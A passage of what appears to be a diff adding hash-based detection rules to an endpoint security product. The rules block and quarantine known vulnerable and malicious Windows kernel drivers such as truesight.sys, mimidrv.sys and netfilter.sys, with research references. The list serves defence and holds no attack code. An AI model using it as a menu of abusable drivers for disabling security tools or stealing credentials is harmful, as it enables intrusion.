+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6edd5a8a-4119-5801-b4db-40292f8839d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827975Z",
+ "creation_date": "2026-03-23T11:45:30.827978Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827983Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd72a998f433f807dc5ee331a52286717f787f6c5c9e22491f8bd685e0da2f66",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ef08fe4-c3ab-5896-a9b1-a2fda92ab558",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464202Z",
+ "creation_date": "2026-03-23T11:45:30.464215Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4c9c84b211899ceb0d18a839afa497537a7c7c01ab481965a09788a9e16590c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6efc3165-2e4f-56e2-8964-a9876ad1855f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479650Z",
+ "creation_date": "2026-03-23T11:45:30.479651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a367f9af0d4995eafb7bbdb4fa60eee88e470f7192276d3d66afc58f75013e1",
+ "comment": "Malicious Kernel Driver (aka be6318413160e589080df02bb3ca6e6a.sys) [https://www.loldrivers.io/drivers/a9ab4412-d484-459b-be97-5975f5ab8094/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6efe81ff-6906-5491-b055-b2775cb049a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815069Z",
+ "creation_date": "2026-03-23T11:45:31.815072Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815081Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12a4df784e6e897c36a4d074175c39d03c9ba5cd5ca37f27f50b70b7ab6b43a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f208011-1eda-526c-8dae-a818d0881f57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500230Z",
+ "creation_date": "2026-03-23T11:45:31.500233Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500241Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "975092496ce4f4c728aab097f43433ce212e947e69e87f04391f6d9ab38d3a85",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f295f21-f9f8-5b86-86f3-6bfa096432bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459356Z",
+ "creation_date": "2026-03-23T11:45:30.459359Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459368Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6703400b490b35bcde6e41ce1640920251855e6d94171170ae7ea22cdd0938c0",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f2e735d-1e9f-5c96-9e6e-38231136ea15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967381Z",
+ "creation_date": "2026-03-23T11:45:29.967383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967389Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9804787b31e0025dd2ae9344ca1beae2e701cdf8fd77a60f424295dc9280dc89",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f2ef343-e9c8-51aa-8b2d-f3525e6c9c6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149282Z",
+ "creation_date": "2026-03-23T11:45:31.149284Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149290Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecf7fef0a3e19f21730760600c6fa887466ccc39f1e2dde96cada2f2e02f65d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f313f3a-8bc2-5d1b-80ba-59a4c92405c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469600Z",
+ "creation_date": "2026-03-23T11:45:30.469603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469612Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f424562623d0edf9b506a5f65b23427e7ec9a476570646d2a08ae9fa9fc57305",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f3853ea-c3ce-5a8d-8185-eaf4ddf94530",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829861Z",
+ "creation_date": "2026-03-23T11:45:31.829863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829883Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "825578c10c86e4aeb9dd971df6e87becbcf3566350aedd9d296a57b9647f78e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f3c19fd-5299-5558-993e-fcc94120d591",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141698Z",
+ "creation_date": "2026-03-23T11:45:31.141700Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65a1610e10217ccbe221fa54dd8403b632267bd82326460c918faeb5bb960058",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f3ee1eb-525c-53b8-b1cd-7c98b06564db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487254Z",
+ "creation_date": "2026-03-23T11:45:31.487256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afd5b0e98eacebd6ee17cb1fc7039c07651a5c218524e2714434806fe00e4263",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f400690-869a-5d92-b551-3b8aaf2b8c32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604907Z",
+ "creation_date": "2026-03-23T11:45:29.604909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96a5d22ea53ee40f15528f4c19cac0b121a89b65e5c70488819c2fcd7c95d24c",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f4561ad-ea5f-54f3-a8c1-8046e0b552ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473601Z",
+ "creation_date": "2026-03-23T11:45:30.473604Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67b4d4995c9a054e90af05d7e04baf39759c478a519a3c729cbf6ffb041ae7cb",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f4a1f5d-482e-5cfb-b96f-d16f6a3098b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159900Z",
+ "creation_date": "2026-03-23T11:45:31.159903Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159912Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32e30d7996c58ff8a86d6da9305b3f33efd0635d3fee2b038e71ef0e8240ea62",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f4beae0-9bca-54ea-8991-88c830476179",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978318Z",
+ "creation_date": "2026-03-23T11:45:29.978320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce",
+ "comment": "Malicious Kernel Driver (aka wantd_4.sys) [https://www.loldrivers.io/drivers/72637cb1-5ca2-4ad0-a5df-20da17b231b5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f5d4374-cf12-54d8-a471-e3794bf03308",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832352Z",
+ "creation_date": "2026-03-23T11:45:30.832354Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19fe9e32765d6e3f4b9950d5a04970ffd65845a3eda96aacf2378c0ec401d664",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f66f970-5cbd-543c-b0e3-78b73ce09a22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983851Z",
+ "creation_date": "2026-03-23T11:45:29.983854Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983862Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47dba240967fd0088be618163672dfbddf0138178cccd45b54037f622b221220",
+ "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f685ca9-67c4-510f-947e-9eeaa43068a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492592Z",
+ "creation_date": "2026-03-23T11:45:31.492594Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492599Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e32bca5cfb81aad5d03aece6d63089c804460e9e8a4e7d8fbd536022542d3ea9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f6cc55d-f3ff-575d-9bd2-28bcc1752717",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618373Z",
+ "creation_date": "2026-03-23T11:45:29.618375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2a4ddc38e68efd2eac27b2562529926f5ade93575a82e8d3e0abb2b37347257",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f6de817-e32d-585c-a3cd-090197be81a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464397Z",
+ "creation_date": "2026-03-23T11:45:30.464400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464408Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "618b15970671700188f4102e5d0638184e2723e8f57f7e917fa49792daebdadb",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f6f724b-4d8b-5dbb-976d-006ff9d85b44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475092Z",
+ "creation_date": "2026-03-23T11:45:31.475096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "413d1f175419d5fbda10ba5c013c33b6efe1ba8b762569e9a1e807dfdf7c95e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6f7d33ab-5e24-5a43-80d5-7af7e93da031",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
